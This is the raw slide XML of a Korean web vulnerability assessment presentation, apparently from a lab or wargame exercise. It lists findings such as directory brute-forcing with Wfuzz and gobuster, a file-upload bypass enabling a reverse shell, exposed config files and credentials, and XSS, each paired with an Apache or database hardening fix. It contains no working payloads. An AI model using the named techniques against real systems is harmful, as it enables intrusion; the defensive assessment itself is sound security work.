                        <a:latin typeface="Pretendard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79555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7375439E-13C3-428B-90C0-CCE4B258D3FD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="6269718" y="2221307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24BFCC1-FB60-43F2-820D-E7905584F0B5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="6269718" y="3162300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D69A126-AE90-4FD5-8123-61C5588E9F27}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="6269718" y="4152900"/>
            <a:ext cx="203200" cy="2064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2B9ED61-43D1-45BE-988A-48A0723BB461}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="6269718" y="5089424"/>
            <a:ext cx="203200" cy="2064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FB82089-FF27-444B-8A96-1EF0F65DD9FA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="6269718" y="6057900"/>
            <a:ext cx="203200" cy="2064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5E71AB7-DF3D-47CD-B6A4-936EC3864455}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1381573" y="7219508"/>
            <a:ext cx="4374254" cy="1134894"/>
            <a:chOff x="1594242" y="7123983"/>
            <a:chExt cx="4374254" cy="113489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464825-8639-4E8F-9C7C-4F43086FDB38}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1600200" y="7132973"/>
              <a:ext cx="234754" cy="23475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67BD85-BEEA-4FF0-9B57-68081505ABA0}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1594242" y="7559329"/>
              <a:ext cx="234754" cy="23475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EB28719-42EA-488D-A41F-56A2D7993ED3}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1594242" y="7997801"/>
              <a:ext cx="234754" cy="2347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A634233D-ECCC-47F1-AC5F-C55CCCD4FF52}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2782516" y="7123983"/>
              <a:ext cx="2526718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총 </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR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5</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1599" b="1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건중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 </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR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3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건은 고위험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0D914738-E80A-4095-BE36-23941466398D}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1999456" y="7128880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높음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A4743F84-8A7B-41FB-BF83-DE65901B8E28}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1997390" y="7573843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중간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71A2417B-BD47-4952-9C0C-623CDA037E13}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1999456" y="8015221"/>
              <a:ext cx="62835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낮음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5AE279F7-7841-4A68-90AF-01AEE2780DFF}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2823171" y="7562599"/>
              <a:ext cx="3145325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919"/>
                </a:lnSpc>
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
              </a:pP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→ 권고사항은 </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1599" b="1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다음슬라이드</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1599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rPr>
                <a:t> 참조</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1599" b="1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Bold"/>
                <a:sym typeface="Arita Dotum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70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3307" y="1304280"/>
            <a:ext cx="11036494" cy="56353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4471165"/>
            <a:chOff x="1961752" y="3058105"/>
            <a:chExt cx="15107048" cy="4471165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1.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디렉터리</a:t>
              </a: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/</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="3200" b="1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페이지브루트포싱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 방지</a:t>
              </a:r>
              <a:endParaRPr lang="en-US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19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같은 숨은 페이지를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wfuzz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,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gobuster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등으로 쉽게 발견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디렉터리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리스팅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차단되지 않아 구조가 외부에 노출됨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4" y="6654800"/>
              <a:ext cx="15107046" cy="8744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존재하지 않는 경로 요청 시 항상 동일한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403/404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에러 페이지 출력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WAF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설정을 통해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브루트포싱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34" name="AutoShape 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{990751D3-145F-4EE0-9345-4BB3035E9FEC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4E40ACF-C191-4BB6-9915-46DFAB3D79CA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1010539" y="6255754"/>
            <a:ext cx="11944313" cy="3742284"/>
            <a:chOff x="857288" y="6370054"/>
            <a:chExt cx="14826729" cy="359526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CED827-D60F-446C-836E-88B3029A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7288" y="6370054"/>
              <a:ext cx="7341960" cy="359526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4E176A9-B3F8-4F63-A336-A6494D86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99248" y="6370054"/>
              <a:ext cx="7484769" cy="3584215"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic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5DC64C5E-D806-49E7-98B0-3181F33816D1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3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980DC9-7DFE-4F9D-8B47-DED7AEBCDDAE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8161984"/>
            <a:chOff x="1961752" y="3058105"/>
            <a:chExt cx="15107048" cy="8161984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2.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보안 설정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/uploads/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firewall_final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등에서 내부 보안 정책이 노출됨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4565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민감한 설정 파일은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/var/www/html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하위가 아닌 외부 경로로 이동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업로드 서버와 운영 서버 분리하여 보안 강화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.conf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bak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.log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등의 파일 확장자에 접근 제한 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&gt; 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etc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/httpd/conf/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httpd.conf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 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&lt;Directory “/var/www/html”&gt;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&lt;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FilesMatch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“\.(conf |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bak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| log)$”&gt;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     Require all denied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&lt;/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FilesMatch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&lt;/Directory&gt;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</a:t>
              </a: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7328F88E-917D-4B62-A79F-8FE2013132C5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8F2950-5BFD-422B-AD34-E600F574D777}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1999456" y="6782538"/>
            <a:ext cx="5163344" cy="27043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07770A0-2244-4214-B00E-BFDDBA3356EC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36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723900"/>
            <a:ext cx="2438400" cy="168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333500" y="2730500"/>
            <a:ext cx="57150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alphaModFix amt="33000"/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="11252200" y="2730500"/>
            <a:ext cx="57150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073900" y="2133600"/>
            <a:ext cx="41656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6800" b="0" i="0" u="none" strike="noStrike" spc="-1200">
                <a:solidFill>
                  <a:srgbClr val="44CCE5"/>
                </a:solidFill>
                <a:ea typeface="S-Core Dream 7 ExtraBold"/>
              </a:rPr>
              <a:t>목</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" sz="6800" b="0" i="0" u="none" strike="noStrike" spc="-500">
                <a:solidFill>
                  <a:srgbClr val="44CCE5"/>
                </a:solidFill>
                <a:ea typeface="S-Core Dream 7 ExtraBold"/>
              </a:rPr>
              <a:t>차</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" sz="6800" b="0" i="0" u="none" strike="noStrike" spc="-1200">
                <a:solidFill>
                  <a:srgbClr val="3958E3"/>
                </a:solidFill>
                <a:ea typeface="S-Core Dream 7 ExtraBold"/>
              </a:rPr>
              <a:t>보기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26400" y="33020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9E9E9E">
                    <a:alpha val="81961"/>
                  </a:srgbClr>
                </a:solidFill>
                <a:latin typeface="Montserrat Bold"/>
              </a:rPr>
              <a:t>TABLE OF INDEX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53973C-36E5-4D08-9833-33ECD05228D4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1346200" y="3886200"/>
            <a:ext cx="4953000" cy="2527300"/>
            <a:chOff x="1346200" y="3886200"/>
            <a:chExt cx="4953000" cy="25273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4400" y="3886200"/>
              <a:ext cx="749300" cy="7493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43300" y="3975100"/>
              <a:ext cx="558800" cy="5588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5600" y="5384800"/>
              <a:ext cx="4381500" cy="12700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2057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ea typeface="S-Core Dream 5 Medium"/>
                </a:rPr>
                <a:t>점검대상  및  과정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594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 dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="44CCE5"/>
                  </a:solidFill>
                  <a:latin typeface="S-Core Dream 7 ExtraBold"/>
                </a:rPr>
                <a:t>01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05CB1B5-39BD-47D4-88B0-BD5ED285963D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6667500" y="3886200"/>
            <a:ext cx="4953000" cy="2527300"/>
            <a:chOff x="6667500" y="3886200"/>
            <a:chExt cx="4953000" cy="25273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75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75700" y="3886200"/>
              <a:ext cx="749300" cy="7493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64600" y="3975100"/>
              <a:ext cx="558800" cy="5588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9600" y="5384800"/>
              <a:ext cx="4381500" cy="12700"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="39" name="TextBox 39"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7391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ea typeface="S-Core Dream 5 Medium"/>
                </a:rPr>
                <a:t>진단대상  정보수집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928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 dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                  <a:latin typeface="S-Core Dream 7 ExtraBold"/>
                </a:rPr>
                <a:t>02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619A7C4-EFC8-4CD2-BBD2-568B18571C62}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="12001500" y="3886200"/>
            <a:ext cx="4953000" cy="2527300"/>
            <a:chOff x="12001500" y="3886200"/>
            <a:chExt cx="4953000" cy="25273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01500" y="42164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09700" y="3886200"/>
              <a:ext cx="749300" cy="7493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198600" y="3975100"/>
              <a:ext cx="558800" cy="5588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3600" y="5384800"/>
              <a:ext cx="4381500" cy="12700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2725400" y="46482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취약점  공격 시도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4262100" y="40894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44CCE5"/>
                  </a:solidFill>
                  <a:latin typeface="S-Core Dream 7 ExtraBold"/>
                </a:rPr>
                <a:t>03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1A9E601-4679-45EF-97E4-CF3736BB1793}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1346200" y="6731000"/>
            <a:ext cx="4953000" cy="2514600"/>
            <a:chOff x="1346200" y="6731000"/>
            <a:chExt cx="4953000" cy="25146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4400" y="6731000"/>
              <a:ext cx="749300" cy="74930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43300" y="6819900"/>
              <a:ext cx="558800" cy="55880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5600" y="8216900"/>
              <a:ext cx="4381500" cy="12700"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="45" name="TextBox 45"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2057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b="0" i="0" u="none" strike="noStrike" spc="-600" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="00000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점검 결과</a:t>
              </a:r>
              <a:endParaRPr lang="ko-KR" sz="3200" b="0" i="0" u="none" strike="noStrike" spc="-600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594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FFFFFF"/>
                  </a:solidFill>
                  <a:latin typeface="S-Core Dream 7 ExtraBold"/>
                </a:rPr>
                <a:t>04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170DDEA-36A3-4AF5-905A-451CEE702F6D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6667500" y="6731000"/>
            <a:ext cx="4953000" cy="2514600"/>
            <a:chOff x="6667500" y="6731000"/>
            <a:chExt cx="4953000" cy="2514600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75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75700" y="6731000"/>
              <a:ext cx="749300" cy="7493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64600" y="6819900"/>
              <a:ext cx="558800" cy="5588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9600" y="8216900"/>
              <a:ext cx="4381500" cy="12700"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="48" name="TextBox 48"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7391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취약점해결방안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8928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44CCE5"/>
                  </a:solidFill>
                  <a:latin typeface="S-Core Dream 7 ExtraBold"/>
                </a:rPr>
                <a:t>05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1754DE1-D235-460C-94E7-468C44874E63}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="12001500" y="6731000"/>
            <a:ext cx="4953000" cy="2514600"/>
            <a:chOff x="12001500" y="6731000"/>
            <a:chExt cx="4953000" cy="25146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01500" y="7048500"/>
              <a:ext cx="4953000" cy="2197100"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:effectLst>
              <a:outerShdw blurRad="41827" dist="84264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09700" y="6731000"/>
              <a:ext cx="749300" cy="7493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198600" y="6819900"/>
              <a:ext cx="558800" cy="558800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3600" y="8216900"/>
              <a:ext cx="4381500" cy="12700"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="51" name="TextBox 51"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="12725400" y="7480300"/>
              <a:ext cx="35179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3200" spc="-600" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="000000"/>
                  </a:solidFill>
                  <a:ea typeface="S-Core Dream 5 Medium"/>
                </a:rPr>
                <a:t>질의응답</a:t>
              </a:r>
              <a:endParaRPr lang="ko-KR" sz="3200" b="0" i="0" u="none" strike="noStrike" spc="-600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:ea typeface="S-Core Dream 7 ExtraBold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4262100" y="6921500"/>
              <a:ext cx="4445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sz="1700" b="0" i="0" u="none" strike="noStrike" spc="-100">
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                  <a:latin typeface="S-Core Dream 7 ExtraBold"/>
                </a:rPr>
                <a:t>06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792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6315324"/>
            <a:chOff x="1961752" y="3058105"/>
            <a:chExt cx="15107048" cy="6315324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45802D9-8116-4DF8-A1AC-15E5C9389A33}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1961752" y="3820105"/>
              <a:ext cx="14581110" cy="0"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="9525" cap="flat">
              <a:solidFill>
                <a:srgbClr val="0F0F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3.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파일 업로드 취약점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우회를 통한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비허용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파일 업로드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reverseshell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실행 위험 존재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718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및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MIME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타입 모두 검사 후 허용된 파일만 업로드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Apache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httpd.conf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추가</a:t>
              </a:r>
              <a:b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</a:b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&lt;Directory "/var/www/html/uploads"&gt;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php_admin_flag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engine off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&lt;/Directory&gt;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 헤더 검사로 위장된 스크립트 업로드 차단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05000" y="6286500"/>
            <a:ext cx="5148502" cy="13325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CC712A98-174C-42DE-8B3A-9B80BCBC254D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82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91C2DEF-303A-41B6-9106-CBAE4D40AEC9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811727"/>
            <a:ext cx="10579102" cy="4930330"/>
            <a:chOff x="1961752" y="3058105"/>
            <a:chExt cx="15107048" cy="493033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4.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정보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웹 루트 내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파일에 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계정 정보가 포함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쉘 획득 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정보 즉시 탈취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3336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접근 권한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chmod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640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비밀번호는 반드시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36034" y="5921275"/>
            <a:ext cx="2559766" cy="3833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33504999-4207-4F0A-96B7-078D0BAF8F70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9698800A-A889-4751-85EB-2B90A5FDEB9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10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389173"/>
            <a:chOff x="1961752" y="3058105"/>
            <a:chExt cx="15107048" cy="5389173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5.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계정 권한 과다 부여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하나의 계정으로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전체 접근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792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wargame_user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필요 테이블만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SELECT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권한 부여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접근은 내부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IP(127.0.0.1)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로만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9F0009D9-85CF-4151-AEFF-010F90212C6B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64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853660"/>
            <a:chOff x="1961752" y="3058105"/>
            <a:chExt cx="15107048" cy="585366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6. XSS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해결방안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악성 스크립트를 삽입하여 다른 사용자 브라우저에서 실행되는 공격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2569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출력 시 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HTML/JS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특수문자 </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US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이스케이프</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR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(escape)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하기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입력값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검증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HttpOnly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쿠키 설정</a:t>
              </a:r>
              <a:endPara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Content Security Policy (CSP)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D3662295-CAB3-41F7-B3AD-F7059A9F0BF6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23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11200" y="3949700"/>
            <a:ext cx="2819400" cy="347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3300" y="4394200"/>
            <a:ext cx="2755900" cy="259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8100" y="5676900"/>
            <a:ext cx="2946400" cy="276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5880100"/>
            <a:ext cx="2933700" cy="262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7500" y="7429500"/>
            <a:ext cx="520700" cy="181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2500" y="7061200"/>
            <a:ext cx="482600" cy="180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0200" y="7416800"/>
            <a:ext cx="520700" cy="1828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13454" y="2470150"/>
            <a:ext cx="133604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altLang="en-US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감사합니다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR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.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="9000" b="0" i="0" u="none" strike="noStrike" spc="-700" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="S-Core Dream 4 Regular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555263E2-742E-43DE-B442-4C56E72DC23E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14" name="그림 13">
            <a:hlinkClick r:id="rId14"/>
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CE2BE25F-C435-4DFD-9645-D3964939AC2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35438" r="7247" b="33995"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5556250" y="4606925"/>
            <a:ext cx="7245350" cy="17272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863600"/>
            <a:ext cx="2095500" cy="259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5400000">
            <a:off x="1231900" y="5130800"/>
            <a:ext cx="81915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954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44CCE5"/>
                </a:solidFill>
                <a:ea typeface="S-Core Dream 7 ExtraBold"/>
              </a:rPr>
              <a:t>점검대상  및 </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="6800" b="0" i="0" u="none" strike="noStrike" spc="-1100" dirty="0">
              <a:solidFill>
                <a:srgbClr val="44CCE5"/>
              </a:solidFill>
              <a:latin typeface="S-Core Dream 7 ExtraBold"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="83830"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="6800" spc="-1100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3958E3"/>
                </a:solidFill>
                <a:ea typeface="S-Core Dream 7 ExtraBold"/>
              </a:rPr>
              <a:t>과정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58900" y="52451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FFFFFF">
                    <a:alpha val="47843"/>
                  </a:srgbClr>
                </a:solidFill>
                <a:latin typeface="Montserrat Bold"/>
              </a:rPr>
              <a:t>PROJECT OUTLINE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AB5572-5B8F-47FB-8139-93BA5CB4D9E9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5486400" y="1866900"/>
            <a:ext cx="4521200" cy="6197600"/>
            <a:chOff x="5486400" y="1866900"/>
            <a:chExt cx="4521200" cy="61976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44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46800" y="2019300"/>
              <a:ext cx="3162300" cy="9779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>
              <a:alphaModFix amt="54000"/>
            </a:blip>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm rot="10800000">
              <a:off x="6311900" y="5270500"/>
              <a:ext cx="2921000" cy="127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6794500" y="3517900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sz="2000" b="0" i="0" u="none" strike="noStrike" spc="-400" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="44CCE5"/>
                  </a:solidFill>
                  <a:ea typeface="S-Core Dream 5 Medium"/>
                </a:rPr>
                <a:t>전체기간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513996" y="2313608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수행  일정</a:t>
              </a:r>
              <a:endParaRPr lang="ko-KR" sz="2600" b="0" i="0" u="none" strike="noStrike" spc="-500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:ea typeface="S-Core Dream 5 Medium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6372225" y="5824606"/>
              <a:ext cx="28702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/>
                </a:rPr>
                <a:t>192.168.5.~</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr lvl="0" algn="ctr">
                <a:lnSpc>
                  <a:spcPct val="95449"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" alt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192.168.56.~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299200" y="5448300"/>
              <a:ext cx="288925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점     검      자         아   이     피</a:t>
              </a:r>
              <a:endParaRPr lang="ko-KR" sz="2000" b="0" i="0" u="none" strike="noStrike" spc="-400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="44CCE5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299200" y="6716544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altLang="ko-KR" sz="1700" spc="-100" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="000000">
                      <a:alpha val="58824"/>
                    </a:srgbClr>
                  </a:solidFill>
                  <a:latin typeface="Pretendard Medium"/>
                  <a:ea typeface="Pretendard Medium"/>
                </a:rPr>
                <a:t>Kali, Rocky Linux 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ea typeface="Pretendard Medium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767996" y="6438899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altLang="ko-KR" sz="2000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         S</a:t>
              </a:r>
              <a:endParaRPr lang="ko-KR" altLang="ko-KR" sz="2000" b="0" i="0" u="none" strike="noStrike" spc="-400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="44CCE5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48" name="TextBox 35">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C624B201-D12A-4138-9774-5E7E4A89327F}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6350000" y="745490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Wfuzz</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1700" spc="-100" dirty="0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, </a:t>
              </a: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gobuster</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1700" spc="-100" dirty="0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, </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1700" spc="-100" dirty="0" err="1">
                  <a:solidFill>
                    <a:schemeClr val="tx1">
                      <a:alpha val="58824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reverseshell</a:t>
              </a:r>
              <a:endParaRPr lang="ko-KR" sz="1700" b="0" i="0" u="none" strike="noStrike" spc="-100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:alpha val="58824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49" name="TextBox 36">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{346497EA-76EE-4F0D-BA26-8692D50C9AB8}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7247568" y="7139056"/>
              <a:ext cx="1879600" cy="355600"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
          <p:txBody>
            <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0" numCol="2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altLang="ko-KR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T     O    </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="2000" b="0" i="0" u="none" strike="noStrike" spc="-400" dirty="0" err="1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</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR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    L   S</a:t>
              </a:r>
              <a:endParaRPr lang="ko-KR" altLang="ko-KR" sz="2000" b="0" i="0" u="none" strike="noStrike" spc="-400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="44CCE5"/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486400" y="4000500"/>
              <a:ext cx="4521200" cy="850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2025</a:t>
              </a:r>
              <a:r>
                <a:rPr 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년</a:t>
              </a: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06</a:t>
              </a:r>
              <a:r>
                <a:rPr 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월</a:t>
              </a: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02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일</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="ko-KR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  <a:p>
              <a:pPr lvl="0" algn="ctr">
                <a:lnSpc>
                  <a:spcPct val="95449"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1700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~</a:t>
              </a:r>
            </a:p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2025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년 </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR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06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월 </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1700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24</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1700" b="0" i="0" u="none" strike="noStrike" spc="-2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일</a:t>
              </a:r>
              <a:endParaRPr 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F28487-39F5-4661-AC6A-B80D3A23A183}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="9740900" y="1866900"/>
            <a:ext cx="3479800" cy="6197600"/>
            <a:chOff x="9740900" y="1866900"/>
            <a:chExt cx="3479800" cy="61976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409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06000" y="2019300"/>
              <a:ext cx="3162300" cy="9779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>
              <a:alphaModFix amt="54000"/>
            </a:blip>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm rot="10800000">
              <a:off x="10058400" y="5270500"/>
              <a:ext cx="2921000" cy="127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0541000" y="3517900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spc="-400" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="44CCE5"/>
                  </a:solidFill>
                  <a:ea typeface="S-Core Dream 5 Medium"/>
                </a:rPr>
                <a:t>웹사이트</a:t>
              </a:r>
              <a:endParaRPr lang="ko-KR" sz="2000" b="0" i="0" u="none" strike="noStrike" spc="-400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="44CCE5"/>
                </a:solidFill>
                <a:ea typeface="S-Core Dream 5 Medium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0287000" y="2313608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점검 대상</a:t>
              </a:r>
              <a:endParaRPr lang="ko-KR" sz="2600" b="0" i="0" u="none" strike="noStrike" spc="-500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:ea typeface="S-Core Dream 5 Medium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021887" y="3892618"/>
              <a:ext cx="2997200" cy="1041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2200" spc="-5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T     e          a          m               E            S            G </a:t>
              </a:r>
              <a:r>
